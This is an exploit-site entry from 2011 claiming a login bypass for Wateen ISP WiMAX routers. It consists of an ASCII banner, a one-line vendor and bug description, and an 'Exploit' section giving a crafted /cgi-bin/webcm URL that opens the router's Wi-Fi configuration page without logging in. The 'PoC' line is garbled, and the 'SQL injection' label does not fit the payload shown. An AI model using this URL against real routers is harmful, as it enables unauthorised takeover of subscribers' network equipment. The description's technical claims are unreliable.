Wateen Isp wimax router login bypass



EKU-ID: 1258 CVE: OSVDB-ID:
Author: 3xploits Published: 2011-11-07 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


 ===================   
  Salam wa Alaikum
 ===================

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++    
             
________                .__         .__  __          
\_____  \___  _________ |  |   ____ |__|/  |_  ______
  _(__  <\  \/  /\____ \|  |  /  _ \|  \   __\/  ___/
 /       \>    < |  |_> >  |_(  <_> )  ||  |  \___ \ 
/______  /__/\_ \|   __/|____/\____/|__||__| /____  >
       \/      \/|__|                             \/ 

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

----------------------------------------
::Wateen Isp wimax router login bypass::
----------------------------------------

Author: 3xploits

Vendor=Pakistan largest internet provider wateen router

Tested on=Against all router

Bug=vulnerable to sql injection login bypass

---------
Exploit
---------
/cgi-bin/webcm?getpage=%2Fusr%2Fwww_safe%2Fhtml%2Fdefs%2Fstyle5%2Fmenus%2Fmenu.html&var:style=style5&var:main=menu&var:menu=wifi&var:menutitle=Wifi&var:pagename=wifi_basic&var:pagetitle=Wifi_Basic&var:navdisable=true


----
Poc
----
http://192.168.15.1/sql injection

-----
Video
-----
http://www.youtube.com/watch?v=n8qgwiDfymw


by 3xploits.
( bug researcher)